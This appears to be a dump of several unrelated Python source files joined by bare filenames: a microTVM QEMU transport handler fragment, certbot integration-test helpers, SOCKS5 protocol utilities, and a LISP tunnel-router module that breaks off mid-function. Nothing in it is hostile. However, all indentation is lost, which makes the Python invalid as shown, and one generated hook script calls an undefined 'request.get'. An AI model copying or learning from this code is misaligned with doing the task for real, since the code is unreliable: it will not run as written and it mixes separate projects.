os.mkfifo(self.read_pipe)
if "gdbserver_port" in self.options:
if "env" in self.kwargs:
self.kwargs["env"] = copy.copy(self.kwargs["env"])
else:
self.kwargs["env"] = os.environ.copy()
self.kwargs["env"]["TVM_QEMU_GDBSERVER_PORT"] = str(self.options["gdbserver_port"])
self.proc = subprocess.Popen(
["make", "run", f"QEMU_PIPE={self.pipe}"],
cwd=BUILD_DIR,
stdout=subprocess.PIPE,
)
self._wait_for_qemu()
# NOTE: although each pipe is unidirectional, open both as RDWR to work around a select
# limitation on linux. Without this, non-blocking I/O can't use timeouts because named
# FIFO are always considered ready to read when no one has opened them for writing.
self.read_fd = os.open(self.read_pipe, os.O_RDWR | os.O_NONBLOCK)
self.write_fd = os.open(self.write_pipe, os.O_RDWR | os.O_NONBLOCK)
_set_nonblock(self.read_fd)
_set_nonblock(self.write_fd)
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
did_write = False
if self.write_fd is not None:
try:
server.write_with_timeout(
self.write_fd, b"\x01x", 1.0
) # Use a short timeout since we will kill the process
did_write = True
except server.IoTimeoutError:
pass
os.close(self.write_fd)
self.write_fd = None
if self.proc:
if not did_write:
self.proc.terminate()
try:
self.proc.wait(5.0)
except subprocess.TimeoutExpired:
self.proc.kill()
if self.read_fd:
os.close(self.read_fd)
self.read_fd = None
if self.pipe_dir is not None:
shutil.rmtree(self.pipe_dir)
self.pipe_dir = None
def read(self, n, timeout_sec):
return server.read_with_timeout(self.read_fd, n, timeout_sec)
def write(self, data, timeout_sec):
to_write = bytearray()
escape_pos = []
for i, b in enumerate(data):
if b == 0x01:
to_write.append(b)
escape_pos.append(i)
to_write.append(b)
num_written = server.write_with_timeout(self.write_fd, to_write, timeout_sec)
num_written -= sum(1 if x < num_written else 0 for x in escape_pos)
return num_written
def _qemu_check_stdout(self):
for line in self.proc.stdout:
line = str(line)
_LOG.info("%s", line)
if "[QEMU] CPU" in line:
self._queue.put(ZephyrQemuMakeResult.QEMU_STARTED)
else:
line = re.sub("[^a-zA-Z0-9 \n]", "", line)
pattern = r"recipe for target (\w*) failed"
if re.search(pattern, line, re.IGNORECASE):
self._queue.put(ZephyrQemuMakeResult.MAKE_FAILED)
self._queue.put(ZephyrQemuMakeResult.EOF)
def _wait_for_qemu(self):
threading.Thread(target=self._qemu_check_stdout, daemon=True).start()
while True:
try:
item = self._queue.get(timeout=120)
except Exception:
raise TimeoutError("QEMU setup timeout.")
if item == ZephyrQemuMakeResult.QEMU_STARTED:
break
if item in [ZephyrQemuMakeResult.MAKE_FAILED, ZephyrQemuMakeResult.EOF]:
raise RuntimeError("QEMU setup failed.")
raise ValueError(f"{item} not expected.")
if __name__ == "__main__":
server.main(Handler())
|
misc.py
|
"""
Misc module contains stateless functions that could be used during pytest execution,
or outside during setup/teardown of the integration tests environment.
"""
import contextlib
import errno
import multiprocessing
import os
import re
import shutil
import stat
import sys
import tempfile
import time
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.serialization import NoEncryption
from cryptography.hazmat.primitives.serialization import PrivateFormat
from OpenSSL import crypto
import pkg_resources
import requests
from six.moves import SimpleHTTPServer
from six.moves import socketserver
RSA_KEY_TYPE = 'rsa'
ECDSA_KEY_TYPE = 'ecdsa'
def check_until_timeout(url, attempts=30):
"""
Wait and block until given url responds with status 200, or raise an exception
after the specified number of attempts.
:param str url: the URL to test
:param int attempts: the number of times to try to connect to the URL
:raise ValueError: exception raised if unable to reach the URL
"""
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
# Handle old versions of request with vendorized urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
for _ in range(attempts):
time.sleep(1)
try:
if requests.get(url, verify=False).status_code == 200:
return
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after {0} attempts: {1}'.format(attempts, url))
class GracefulTCPServer(socketserver.TCPServer):
"""
This subclass of TCPServer allows graceful reuse of an address that has
just been released by another instance of TCPServer.
"""
allow_reuse_address = True
def _run_server(port):
GracefulTCPServer(('', port), SimpleHTTPServer.SimpleHTTPRequestHandler).serve_forever()
@contextlib.contextmanager
def create_http_server(port):
"""
Setup and start an HTTP server for the given TCP port.
This server stays active for the lifetime of the context, and is automatically
stopped with context exit, while its temporary webroot is deleted.
:param int port: the TCP port to use
:return str: the temporary webroot attached to this server
"""
current_cwd = os.getcwd()
webroot = tempfile.mkdtemp()
process = multiprocessing.Process(target=_run_server, args=(port,))
try:
# SimpleHTTPServer is designed to serve files from the current working directory at the
# time it starts. So we temporarily change the cwd to our crafted webroot before launch.
try:
os.chdir(webroot)
process.start()
finally:
os.chdir(current_cwd)
check_until_timeout('http://localhost:{0}/'.format(port))
yield webroot
finally:
try:
if process.is_alive():
process.terminate()
process.join() # Block until process is effectively terminated
finally:
shutil.rmtree(webroot)
def list_renewal_hooks_dirs(config_dir):
"""
Find and return paths of all hook directories for the given certbot config directory
:param str config_dir: path to the certbot config directory
:return str[]: list of path to the standard hooks directory for this certbot instance
"""
renewal_hooks_root = os.path.join(config_dir, 'renewal-hooks')
return [os.path.join(renewal_hooks_root, item) for item in ['pre', 'deploy', 'post']]
def generate_test_file_hooks(config_dir, hook_probe):
"""
Create a suite of certbot hook scripts and put them in the relevant hook directory
for the given certbot configuration directory. These scripts, when executed, will write
specific verbs in the given hook_probe file to allow asserting they have effectively
been executed. The deploy hook also checks that the renewal environment variables are set.
:param str config_dir: current certbot config directory
:param hook_probe: path to the hook probe to test hook scripts execution
"""
hook_path = pkg_resources.resource_filename('certbot_integration_tests', 'assets/hook.py')
for hook_dir in list_renewal_hooks_dirs(config_dir):
# We want an equivalent of bash `chmod -p $HOOK_DIR, that does not fail if one folder of
# the hierarchy already exists. It is not the case of os.makedirs. Python 3 has an
# optional parameter `exists_ok` to not fail on existing dir, but Python 2.7 does not.
# So we pass through a try except pass for it. To be removed with dropped support on py27.
try:
os.makedirs(hook_dir)
except OSError as error:
if error.errno != errno.EEXIST:
raise
if os.name != 'nt':
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.sh')
entrypoint_script = '''\
#!/usr/bin/env bash
set -e
"{0}" "{1}" "{2}" "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
else:
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.bat')
entrypoint_script = '''\
@echo off
"{0}" "{1}" "{2}" "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
with open(entrypoint_script_path, 'w') as file_h:
file_h.write(entrypoint_script)
os.chmod(entrypoint_script_path, os.stat(entrypoint_script_path).st_mode | stat.S_IEXEC)
@contextlib.contextmanager
def manual_http_hooks(http_server_root, http_port):
"""
Generate suitable http-01 hooks command for test purpose in the given HTTP
server webroot directory. These hooks command use temporary python scripts
that are deleted upon context exit.
:param str http_server_root: path to the HTTP server configured to serve http-01 challenges
:param int http_port: HTTP port that the HTTP server listen on
:return (str, str): a tuple containing the authentication hook and cleanup hook commands
"""
tempdir = tempfile.mkdtemp()
try:
auth_script_path = os.path.join(tempdir, 'auth.py')
with open(auth_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import requests
import time
import sys
challenge_dir = os.path.join('{0}', '.well-known', 'acme-challenge')
os.makedirs(challenge_dir)
challenge_file = os.path.join(challenge_dir, os.environ.get('CERTBOT_TOKEN'))
with open(challenge_file, 'w') as file_h:
file_h.write(os.environ.get('CERTBOT_VALIDATION'))
url = 'http://localhost:{1}/.well-known/acme-challenge/' + os.environ.get('CERTBOT_TOKEN')
for _ in range(0, 10):
time.sleep(1)
try:
if request.get(url).status_code == 200:
sys.exit(0)
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after 10 attempts: {{0}}'.format(url))
'''.format(http_server_root.replace('\\', '\\\\'), http_port))
os.chmod(auth_script_path, 0o755)
cleanup_script_path = os.path.join(tempdir, 'cleanup.py')
with open(cleanup_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import shutil
well_known = os.path.join('{0}', '.well-known')
shutil.rmtree(well_known)
'''.format(http_server_root.replace('\\', '\\\\')))
os.chmod(cleanup_script_path, 0o755)
yield ('{0} {1}'.format(sys.executable, auth_script_path),
'{0} {1}'.format(sys.executable, cleanup_script_path))
finally:
shutil.rmtree(tempdir)
def generate_csr(domains, key_path, csr_path, key_type=RSA_KEY_TYPE):
"""
Generate a private key, and a CSR for the given domains using this key.
:param domains: the domain names to include in the CSR
:type domains: `list` of `str`
:param str key_path: path to the private key that will be generated
:param str csr_path: path to the CSR that will be generated
:param str key_type: type of the key (misc.RSA_KEY_TYPE or misc.ECDSA_KEY_TYPE)
"""
if key_type == RSA_KEY_TYPE:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
elif key_type == ECDSA_KEY_TYPE:
with warnings.catch_warnings():
# Ignore a warning on some old versions of cryptography
warnings.simplefilter('ignore', category=PendingDeprecationWarning)
key = ec.generate_private_key(ec.SECP384R1(), default_backend())
key = key.private_bytes(encoding=Encoding.PEM, format=PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=NoEncryption())
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key)
else:
raise ValueError('Invalid key type: {0}'.format(key_type))
with open(key_path, 'wb') as file_h:
file_h.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
req = crypto.X509Req()
san = ', '.join(['DNS:{0}'.format(item) for item in domains])
san_constraint = crypto.X509Extension(b'subjectAltName', False, san.encode('utf-8'))
req.add_extensions([san_constraint])
req.set_pubkey(key)
req.set_version(2)
req.sign(key, 'sha256')
with open(csr_path, 'wb') as file_h:
file_h.write(crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req))
def read_certificate(cert_path):
"""
Load the certificate from the provided path, and return a human readable version of it (TEXT mode).
:param str cert_path: the path to the certificate
:returns: the TEXT version of the certificate, as it would be displayed by openssl binary
"""
with open(cert_path, 'rb') as file:
data = file.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, data)
return crypto.dump_certificate(crypto.FILETYPE_TEXT, cert).decode('utf-8')
def load_sample_data_path(workspace):
"""
Load the certbot configuration example designed to make OCSP tests, and return its path
:param str workspace: current test workspace directory path
:returns: the path to the loaded sample data directory
:rtype: str
"""
original = pkg_resources.resource_filename('certbot_integration_tests', 'assets/sample-config')
copied = os.path.join(workspace, 'sample-config')
shutil.copytree(original, copied, symlinks=True)
if os.name == 'nt':
# Fix the symlinks on Windows since GIT is not creating them upon checkout
for lineage in ['a.encryption-example.com', 'b.encryption-example.com']:
current_live = os.path.join(copied, 'live', lineage)
for name in os.listdir(current_live):
if name != 'README':
current_file = os.path.join(current_live, name)
with open(current_file) as file_h:
src = file_h.read()
os.unlink(current_file)
os.symlink(os.path.join(current_live, src), current_file)
return copied
def echo(keyword, path=None):
"""
Generate a platform independent executable command
that echoes the given keyword into the given file.
:param keyword: the keyword to echo (must be a single keyword)
:param path: path to the file were keyword is echoed
:return: the executable command
"""
if not re.match(r'^\w+$', keyword):
raise ValueError('Error, keyword `{0}` is not a single keyword.'
.format(keyword))
return '{0} -c "from __future__ import print_function; print(\'{1}\')"{2}'.format(
os.path.basename(sys.executable), keyword, ' >> "{0}"'.format(path) if path else '')
|
tools.py
|
from .exceptions import UnexpectedValue
from .constants import *
import socket, struct, threading, time
class Tools:
atype2AF = {
ATYP_IPV4:socket.AF_INET,
ATYP_IPV6:socket.AF_INET6,
ATYP_DOMAINNAME:socket.AF_INET
}
def recv2(conn:socket.socket, *args):
"""
Some wrapper, to cath empty returns from recv
"""
try:
data = conn.recv(*args)
if not data:
raise ConnectionResetError("Cannot receive data, socket seems closed")
except Exception as e:
raise ConnectionResetError(str(e))
return data
def serverReadCmd(conn:socket.socket) -> tuple:
"""
Read and parse cmd message from client
return (version:int, cmd:int, atype:int, address:str, port:int)
"""
ver, cmd, _, atype = __class__.recv2(conn, 4, socket.MSG_WAITALL)
if atype == ATYP_DOMAINNAME:
length_name, = __class__.recv2(conn, 1, socket.MSG_WAITALL)
name = __class__.recv2(conn, length_name).decode("utf-8")
elif atype == ATYP_IPV4:
name = socket.inet_ntop(socket.AF_INET, __class__.recv2(conn, 4, socket.MSG_WAITALL))
elif atype == ATYP_IPV6:
name = socket.inet_ntop(socket.AF_INET6, __class__.recv2(conn, 16, socket.MSG_WAITALL))
else:
raise UnexpectedValue(f"Server sent unknown address type {atype}")
port = int.from_bytes(__class__.recv2(conn, 2, socket.MSG_WAITALL), byteorder='big')
return (ver, cmd, atype, name, port)
def serverSendCmdResp(conn:socket.socket, version:int, rep:int, atype:int, bnd_addr:str, bnd_port:int):
"""Send server response to cmd message"""
if atype == ATYP_DOMAINNAME:
bnd_addr = bnd_addr.encode("utf-8")
data = struct.pack(f"!BBxBB{len(bnd_addr)}sH", version, rep, atype, len(bnd_addr), bnd_addr, bnd_port)
elif atype == ATYP_IPV4:
data = struct.pack("!BBxB4sH", version, rep, atype, socket.inet_pton(socket.AF_INET, bnd_addr), bnd_port)
elif atype == ATYP_IPV6:
data = struct.pack("!BBxB16sH", version, rep, atype, socket.inet_pton(socket.AF_INET6, bnd_addr), bnd_port)
conn.send(data)
def serverReadHello(conn:socket.socket) -> tuple:
"""Read and parse "greetings" message from client
return (version:int, methods:list[int])"""
b = __class__.recv2(conn, 2, socket.MSG_WAITALL)
ver = b[0]
nm = b[1]
b = __class__.recv2(conn, nm, socket.MSG_WAITALL)
methods = []
for mtd in b:
methods.append(mtd)
return (ver, methods)
def serverSendHelloResp(conn:socket.socket, version:int, authtype:int):
"""Send server response to greeings message """
conn.send(struct.pack("BB", version, authtype))
def serverReadAuthCreds(conn:socket.socket) ->tuple:
"""
Get client creds by rfc1929 (socks username/password auth)
return (version:int, username:str, password:str)
"""
version, ulen = struct.unpack("BB", __class__.recv2(conn, 2, socket.MSG_WAITALL))
username = __class__.recv2(conn, ulen, socket.MSG_WAITALL)
plen = ord(__class__.recv2(conn, 1))
password = __class__.recv2(conn, plen, socket.MSG_WAITALL)
return (version, username.decode("utf-8"), password.decode("utf-8"))
def serverSendAuthResp(conn:socket.socket, version:int, status:int):
"""
Send response auth \n
status greater than 0 indicates auth failture
"""
conn.send(struct.pack('BB', version, status))
#-------------------------------------------------------------------------------
def clientSendHello(conn:socket.socket, version:int, authtypes:list[int]):
"""
Sends a client Greetings message to server (version, authtypes)
"""
conn.send(struct.pack(f"BB{'B'*len(authtypes)}", version, len(authtypes), *authtypes))
def clientReadHelloResp(conn:socket.socket):
"""
Reads server Greetings message (version, selected auth type)
returns (version:int, selectedauth:int)
"""
version, selected_auth = __class__.recv2(conn, 2)
return (version, selected_auth)
def clientSendCmd(conn:socket.socket, version:int, cmd:int, atype:int, adress:str, port:str):
"""
Sends a command to server
"""
if atype == ATYP_DOMAINNAME:
conn.send(struct.pack(f"!BBxBB{len(adress)}sH", version, cmd, atype, len(adress), adress.encode("utf-8"), port))
elif atype == ATYP_IPV4:
conn.send(struct.pack("!BBxB4sH", version, cmd, atype, socket.inet_pton(socket.AF_INET, adress), port) )
elif atype == ATYP_IPV6:
conn.send(struct.pack("!BBxB16sH", version, cmd, atype, socket.inet_pton(socket.AF_INET6, adress), port))
else:
raise UnexpectedValue(f"Cliend sent unknown address type {atype}")
def clientReadCmdResp(conn:socket.socket):
"""
Reads server command response\n
returns (version:int, rep:int, atype:int, address:str, port:int)
"""
b = __class__.recv2(conn, 4)
version, rep, atype = struct.unpack("BBxB", b)
if atype == ATYP_DOMAINNAME:
adrsize = __class__.recv2(conn, 1)[0]
address, port = struct.unpack(f"!{adrsize}sH", __class__.recv2(conn, adrsize+2))
elif atype == ATYP_IPV4:
address, port = struct.unpack("!4sH", __class__.recv2(conn, 10))
address = socket.inet_ntop(socket.AF_INET, address)
elif atype == ATYP_IPV6:
address, port = struct.unpack("!16sH", __class__.recv2(conn, 18))
address = socket.inet_ntop(socket.AF_INET6, address)
else:
raise UnexpectedValue(f"Sever sent unknown address type {atype}")
return (version, rep, atype, address, port)
def clientSendAuth(conn:socket.socket, username:str, password:str):
"""
Sends username/pasword auth packet
"""
s = struct.pack(f"BB{len(username)}sB{len(password)}s", 1, len(username), username.encode("utf-8"), len(password), password.encode("utf-8"))
conn.send(s)
def clientReadAuthResp(conn:socket.socket):
"""
Reads server response on username/password auth
return (ver:int, status:int)
"""
ver, status = __class__.recv2(conn, 2)
return (ver, status)
def proxy(target1:socket.socket, target2:socket.socket):
"""
sends data from target1 to target2 and back\n
when at least one socket closed, returns control\n
sets timeout both sockets to 5
"""
def resend(from_s:socket.socket, to_s:socket.socket):
try:
from_s.settimeout(5)
while True:
try:
b = from_s.recv(1024)
if len(b) == 0:
return
to_s.send(b)
except socket.timeout as e:
pass
except Exception as e:
# print(f"c > t {e}")
return
except:
pass
t1 = threading.Thread(target=resend, args=(target1, target2), name=f"{target1.getpeername()} client > I am > target {target2.getpeername()} ")
t2 = threading.Thread(target=resend, args=(target2, target1), name=f"{target1.getpeername()} client < I am < target {target2.getpeername()} ")
t1.start()
t2.start()
while t1.is_alive() and t2.is_alive():
time.sleep(5)
return
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#------------------------------------------------------------------------------
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
global lisp_trigger_register_timer
global lisp_send_sockets
lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port)
#
# Trigger Map-Register when all databaase-mappings are configured.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
if (len(lisp.lisp_map_servers_list) > 0):
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
#enddef
#
# lisp_etr_show_command
#
# Show ETR configured map-servers and database-mappings.
#
def lisp_etr_show_command(clause):
#
# Show local found RLOCs.
#
output = lispconfig.lisp_show_myrlocs("")
#
# Show decapsulation stats.
#
output = lispconfig.lisp_show_decap_stats(output, "ETR")
#
# Show configured map-servers.
#
dns_suffix = lisp.lisp_decent_dns_suffix
if (dns_suffix == None):
dns_suffix = ":"
else:
dns_suffix = " (dns-suffix '{}'):".format(dns_suffix)
#endif
hover = "{} configured map-servers".format(len(lisp.lisp_map_servers_list))
title = "LISP-ETR Configured Map-Servers{}".format(dns_suffix)
title = lisp.lisp_span(title, hover)
hover = ("P = proxy-reply requested, M = merge-registrations " + \
"requested, N = Map-Notify requested")
reg_title = lisp.lisp_span("Registration<br>flags", hover)
output += lispconfig.lisp_table_header(title, "Address", "Auth-Type",
"xTR-ID", "Site-ID", reg_title, "Map-Registers<br>Sent",
"Map-Notifies<br>Received")
for ms in lisp.lisp_map_servers_list.values():
ms.resolve_dns_name()
ms_name = "" if ms.ms_name == "all" else ms.ms_name + "<br>"
addr_str = ms_name + ms.map_server.print_address_no_iid()
if (ms.dns_name): addr_str += "<br>" + ms.dns_name
xtr_id = "0x" + lisp.lisp_hex_string(ms.xtr_id)
flags = "{}-{}-{}-{}".format("P" if ms.proxy_reply else "p",
"M" if ms.merge_registrations else "m",
"N" if ms.want_map_notify else "n",
"R" if ms.refresh_registrations else "r")
registers_sent = ms.map_registers_sent + \
ms.map_registers_multicast_sent
output += lispconfig.lisp_table_row(addr_str,
"sha1" if (ms.alg_id == lisp.LISP_SHA_1_96_ALG_ID) else "sha2",
xtr_id, ms.site_id, flags, registers_sent,
ms.map_notifies_received)
#endfor
output += lispconfig.lisp_table_footer()
#
# Show database-mappings configured.
#
output = lispconfig.lisp_show_db_list("ETR", output)
#
# Show ELP configuration, if it exists.
#
if (len(lisp.lisp_elp_list) != 0):
output = lispconfig.lisp_show_elp_list(output)
#endif
#
# Show RLE configuration, if it exists.
#
if (len(lisp.lisp_rle_list) != 0):
output = lispconfig.lisp_show_rle_list(output)
#endif
#
# Show JSON configuration, if it exists.
#
if (len(lisp.lisp_json_list) != 0):
output = lispconfig.lisp_show_json_list(output)
#endif
#
# Show group-mappings, if they exist.
#
if (len(lisp.lisp_group_mapping_list) != 0):
title = "Configured Group Mappings:"
output += lispconfig.lisp_table_header(title, "Name", "Group Prefix",
"Sources", "Use MS")
for gm in lisp.lisp_group_mapping_list.values():
sources = ""
for s in gm.sources: sources += s + ", "
if (sources == ""):
sources = "*"
else:
sources = sources[0:-2]
#endif
output += lispconfig.lisp_table_row(gm.group_name,
gm.group_prefix.print_prefix(), sources, gm.use_ms_name)
#endfor
output += lispconfig.lisp_table_footer()
#endif
return(output)
#enddef
#
# lisp_etr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_etr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ETR"))
#enddef
#
# lisp_map_server_command
#
# Store configured map-servers.
#
def lisp_map_server_command(kv_pairs):
global lisp_trigger_register_timer
global lisp_etr_info_timer
addresses = []
dns_names = []
key_id = 0
alg_id = 0
password = ""
proxy_reply = False
merge = False
refresh = False
want = False
site_id = 0
ms_name = None
ekey_id = 0
ekey = None
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for i in range(len(value)):
addresses.append(value[i])
#endfor
#endif
if (kw == "dns-name"):
for i in range(len(value)):
dns_names.append(value[i])
#endfor
#endif
if (kw == "authentication-type"):
alg_id = lisp.LISP_SHA_1_96_ALG_ID if (value == "sha1") else \
lisp.LISP_SHA_256_128_ALG_ID if (value == "sha2") else ""
#endif
if (kw == "authentication-key"):
if (alg_id == 0): alg_id = lisp.LISP_SHA_256_128_ALG_ID
auth_key = lisp.lisp_parse_auth_key(value)
key_id = auth_key.keys()[0]
password = auth_key[key_id]
#endif
if (kw == "proxy-reply"):
proxy_reply = True if value == "yes" else False
#endif
if (kw == "merge-registrations"):
merge = True if value == "yes" else False
#endif
if (kw == "refresh-registrations"):
refresh = True if value == "yes" else False
#endif
if (kw == "want-map-notify"):
want = True if value == "yes" else False
#endif
if (kw == "site-id"):
site_id = int(value)
#endif
if (kw == "encryption-key"):
ekey = lisp.lisp_parse_auth_key(value)
ekey_id = ekey.keys()[0]
ekey = ekey[ekey_id]
#Endif
#endfor
#
# Store internal data structure.
#
ms = None
for addr_str in addresses:
if (addr_str == ""): continue
ms = lisp.lisp_ms(addr_str, None, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
for name in dns_names:
if (name == ""): continue
ms = lisp.lisp_ms(None, name, ms_name, alg_id, key_id, password,
proxy_reply, merge, refresh, want, site_id, ekey_id, ekey)
#endfor
#
# Trigger a Info-Request if we are doing NAT-traversal if this is the
# first Map-Server..
#
first_ms = (len(lisp.lisp_map_servers_list) == 1)
if (first_ms):
ms = lisp.lisp_map_servers_list.values()[0]
lisp_etr_info_timer = threading.Timer(2, lisp_etr_process_info_timer,
[ms.map_server])
lisp_etr_info_timer.start()
else:
#
# Trigger Map-Register to newly configured Map-Server.
#
# Do not trigger Map-Register if NAT-traveral is configured. We may not
# have the global RLOC yet from Info-Replies. When the Info-Reply comes
# in we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (ms and len(lisp.lisp_db_list) > 0):
lisp_build_map_register(lisp_send_sockets, None, None, ms, False)
#endif
#endif
#
# Handle case where "lisp database-mapping" comes before "lisp map-server"
# in configuration file. We have to start periodic timer.
#
if (len(lisp.lisp_db_list) > 0):
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
return
#enddef
#
# lisp_group_mapping_command
#
# Process the "lisp group-mapping" command clause.
#
def lisp_group_mapping_command(kv_pairs):
sources = []
group_prefix = None
rle_address = None
ms_name = "all"
for kw in kv_pairs.keys():
value = kv_pairs[kw]
if (kw == "group-name"):
group_name = value
#endif
if (kw == "group-prefix"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.store_prefix(value)
#endif
if (kw == "instance-id"):
if (group_prefix == None):
group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
group_prefix.instance_id = int(value)
#endif
if (kw == "ms-name"):
ms_name = value[0]
#endif
if (kw == "address"):
for source in value:
if (source != ""): sources.append(source)
#endfor
#endif
if (kw == "rle-address"):
if (rle_address == None):
rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
#endif
rle_address.store_address(value)
#endif
#endfor
gm = lisp.lisp_group_mapping(group_name, ms_name, group_prefix, sources,
rle_address)
gm.add_group()
return
#enddef
#
# lisp_build_map_register_records
#
# Build EID and RLOC records to be inserted in a Map-Register message.
#
def lisp_build_map_register_records(quiet, db, eid, group, ttl):
#
# Don't include RTR-list if there is no NAT in the path but nat-traversal
# is configured and NAT in path is tested. When there is a NAT, include
# all RTRs if lisp_register_all_rtrs is configured. Otherwise, if the
# array element is None, then the RTR is down and should be excluded in
# the list to register.
#
rtr_list = {}
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
for rtr_str in lisp.lisp_rtr_list:
rtr = lisp.lisp_rtr_list[rtr_str]
if (lisp.lisp_register_all_rtrs == False and rtr == None):
lisp.lprint(" Exclude unreachable RTR {}".format( \
lisp.red(rtr_str, False)))
continue
#endif
if (rtr == None): continue
rtr_list[rtr_str] = rtr
#endif
break
#endfor
count = 0
eid_records = ""
for iid in [eid.instance_id] + eid.iid_list:
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = len(db.rloc_set) + len(rtr_list)
eid_record.authoritative = True
eid_record.record_ttl = ttl
eid_record.eid.copy_address(eid)
eid_record.eid.instance_id = iid
eid_record.eid.iid_list = []
eid_record.group.copy_address(group)
eid_records += eid_record.encode()
if (not quiet):
prefix_str = lisp.lisp_print_eid_tuple(eid, group)
decent_index = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid)
decent_index = lisp.bold(str(decent_index), False)
decent_index = ", decent-index {}".format(decent_index)
#endif
lisp.lprint(" EID-prefix {} for ms-name '{}'{}".format( \
lisp.green(prefix_str, False), db.use_ms_name, decent_index))
eid_record.print_record(" ", False)
#endif
for rloc_entry in db.rloc_set:
rloc_record = lisp.lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.local_bit = rloc_entry.rloc.is_local()
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" ")
#endfor
#
# If we are doing NAT-traversal, include a set or RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in rtr_list.values():
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
if (not quiet): rloc_record.print_record(" RTR ")
#endfor
#
# Return to caller number of EID records written to returned buffer.
#
count += 1
#endfor
return(eid_records, count)
#enddef
#
# lisp_build_map_register
#
# From each configured "database-mapping" command, register mappings to
# configured map-servers.
#
def lisp_build_map_register(lisp_sockets, ttl, eid_only, ms_only, refresh):
#
# No database-mapping entries.
#
if (eid_only != None):
db_list_len = 1
else:
db_list_len = lisp.lisp_db_list_length()
if (db_list_len == 0): return
#endif
lisp.lprint("Build Map-Register for {} database-mapping entries". \
format(db_list_len))
#
# Set boolean if "decentralized-pull-xtr-[modulus,dns-suffix]" configured.
#
decent = lisp.lisp_decent_pull_xtr_configured()
#
# Go quiet with debug output when there are a lot of EID-records.
#
quiet = (db_list_len > 12)
ms_list = {}
if (decent):
#
# If "decentralized-pull-xtr-[modulus,dns-suffix]" is configured,
# decide which map-server this EID belongs too (and is registered with.
#
for db in lisp.lisp_db_list:
eid = db.eid if db.group.is_null() else db.group
